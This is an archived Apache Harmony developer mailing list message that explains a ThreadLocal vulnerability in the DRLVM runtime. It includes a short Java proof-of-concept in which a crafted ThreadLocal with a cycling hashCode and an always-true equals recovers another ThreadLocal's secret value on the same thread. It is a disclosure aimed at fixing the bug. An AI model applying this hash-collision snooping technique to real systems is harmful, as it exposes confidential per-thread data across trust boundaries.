harmony-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Tim Ellison <t.p.elli...@gmail.com>
Subject Re: [drlvm][kernel_classes] ThreadLocal vulnerability
Date Sat, 18 Nov 2006 23:05:56 GMT
FYI: For fun, here's a simple program that illustrates the problem.  On
DRLVM this can find the victim's TLV value.  The regression test is much
shorter.

public class SimpleTLTest {

    public static void main(String[] args) {
        String secretValue = "My secret value";

        // Assume 'victim' is set by some code on this thread
        ThreadLocal<String> victim = new ThreadLocal<String>() {
            public int hashCode() {
                // Imagine this is any int, including the identityHashCode
                return 2;
            }
        };
        victim.set(secretValue);

        // arbitary code in here runs on current thread.

        // evilPhisher tries to find the value on the same thread
        // without a reference to the threadlocal instance.
        ThreadLocal<Object> evilPhisher = new ThreadLocal<Object>() {
            int guessedHashCode = 0;
            // One get() results in a number of hashCode() requests.
            int timesAskedForCurrent = 0;

            public int hashCode() {
                // Phishing for a hash collision with victim
                if (timesAskedForCurrent++ == 4) {
                    timesAskedForCurrent = 0;
                    guessedHashCode++;
                }
                return guessedHashCode;
            }

            public boolean equals(Object arg) {
                // I could easily reflect on arg here to snoop too
                return true; // I'm lying, and always saying true
            }
        };

        /* This is how the phishing is performed.
         * To make the test viable, I'm artificially using knowledge that
         * the victim's hashCode is small, and only making ten get()
attempts.
         */
        for (int i = 0; i < 10; i++) {
            Object guessedValue = evilPhisher.get();
            if (guessedValue == secretValue) {
                System.out.println("Managed to guess victim's
ThreadLocal value");
            }
        }
    }
}

-- 

Tim Ellison (t.p.ellison@gmail.com)
IBM Java technology centre, UK.

Mime
View raw message